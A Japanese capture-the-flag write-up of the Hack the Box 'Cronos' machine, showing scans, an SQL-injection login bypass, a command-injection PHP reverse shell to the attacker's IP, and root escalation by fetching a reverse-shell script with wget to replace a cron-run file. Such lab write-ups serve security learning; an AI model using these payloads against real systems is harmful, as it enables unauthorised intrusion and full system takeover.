【Hack the Box write-up】Cronos

July 04, 2020

はじめに

筆者は Hack the Box 初心者です。 何か訂正や補足、アドバイスなどありましたら、コメントか Twitter までお願いします。 さんぽし(@sanpo_shiho) | Twitter

cheat sheet

以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。 github | sanposhiho/MYCHEATSHEET

machine について

難易度は medium です スクリーンショット 2020-07-04 3.25.50.png

nmap

kali@kali:~$ nmap -sC -sV  10.10.10.13
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-02 05:26 EDT
Nmap scan report for 10.10.10.13
Host is up (0.25s latency).
Not shown: 997 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.43 seconds

80 番

Apache のデフォルトページが出てきます スクリーンショット 2020-07-03 17.42.38.png

cronos.htb を/etc/hosts に追加してアクセスすることで以下のページが出ます

スクリーンショット 2020-07-03 17.42.16.png

gobuster

kali@kali:~$ gobuster dir -u  http://cronos.htb/   -w /usr/share/dirb/wordlists/big.txt -k -t 40 -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://cronos.htb/
[+] Threads:        40
[+] Wordlist:       /usr/share/dirb/wordlists/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
===============================================================
2020/07/03 04:39:42 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/css (Status: 301)
/favicon.ico (Status: 200)
/index.php (Status: 200)
/js (Status: 301)
/robots.txt (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
===============================================================
2020/07/03 04:47:27 Finished
===============================================================

subdomain enumration

kali@kali:~$ host -l cronos.htb 10.10.10.13
Using domain server:
Name: 10.10.10.13
Address: 10.10.10.13#53
Aliases:

cronos.htb name server ns1.cronos.htb.
cronos.htb has address 10.10.10.13
admin.cronos.htb has address 10.10.10.13
ns1.cronos.htb has address 10.10.10.13
www.cronos.htb has address 10.10.10.13

admin.cronos.htb のみが別ページが出てきます

スクリーンショット 2020-07-03 17.49.45.png

gobuster(admin)

kali@kali:~$ gobuster dir -u  http://admin.cronos.htb/   -w /usr/share/dirb/wordlists/big.txt -k -t 40 -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://admin.cronos.htb/
[+] Threads:        40
[+] Wordlist:       /usr/share/dirb/wordlists/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
===============================================================
2020/07/03 13:22:35 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/.htaccess (Status: 403)
/.htaccess.txt (Status: 403)
/.htaccess.php (Status: 403)
/config.php (Status: 200)
/index.php (Status: 200)
/logout.php (Status: 302)
/server-status (Status: 403)
/session.php (Status: 302)
/welcome.php (Status: 302)
===============================================================
2020/07/03 13:29:56 Finished
===============================================================

hydra で brute force で login を試みる

kali@kali:~$ hydra -L /usr/share/wfuzz/wordlist/Injections/SQL.txt -p pass admin.cronos.htb http-post-form "/index.php:username=^USER^&password=^PASS^:Your Login Name or Password is invalid" -f
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-07-03 13:52:56
[DATA] max 16 tasks per 1 server, overall 16 tasks, 125 login tries (l:125/p:1), ~8 tries per task
[DATA] attacking http-post-form://admin.cronos.htb:80/index.php:username=^USER^&password=^PASS^:Your Login Name or Password is invalid
[80][http-post-form] host: admin.cronos.htb   login: ' or 0=0 #   password: pass
[STATUS] attack finished for admin.cronos.htb (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-07-03 13:52:59

SQLi が通りそうです、

スクリーンショット 2020-07-04 3.01.30.png

login 成功しました

RCE

明らかに RCE が通りそうな匂いがしているので以下を入力して Execute!します

10.10.14.48;php -r '$sock=fsockopen("10.10.14.48",4242);exec("/bin/sh -i <&3 >&3 2>&3");'
kali@kali:~$ nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.10.14.48] from (UNKNOWN) [10.10.10.13] 45382
/bin/sh: 0: can't access tty; job control turned off
$

案の定 shell が取れます

PE

crontab を見てみると

$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * *       root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
#

/var/www/laravel/artisan を定期実行しています、なので/var/www/laravel/artisan をphp-reverse-shell.phpに置き換えます

$ cd /var/www/laravel
cd /var/www/laravel
$ wget http://10.10.14.48:8000/php-reverse-shell.php
wget http://10.10.14.48:8000/php-reverse-shell.php
--2020-07-03 21:22:58--  http://10.10.14.48:8000/php-reverse-shell.php
Connecting to 10.10.14.48:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5493 (5.4K) [application/octet-stream]
Saving to: 'php-reverse-shell.php'

php-reverse-shell.p 100%[===================>]   5.36K  --.-KB/s    in 0s

2020-07-03 21:22:58 (598 MB/s) - 'php-reverse-shell.php' saved [5493/5493]

$ mv php-reverse-shell.php artisan
mv php-reverse-shell.php artisan

host から wget を使用して upload しています

この状態で crontab が実行されるのを待っていると…

kali@kali:~$ nc -lnvp 1212
listening on [any] 1212 ...
connect to [10.10.14.48] from (UNKNOWN) [10.10.10.13] 55106
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 21:24:02 up 10:02,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# whoami
root

root が取れました

終わりに

medium にしてはかなり簡単なマシンでした。

このエントリーをはてなブックマークに追加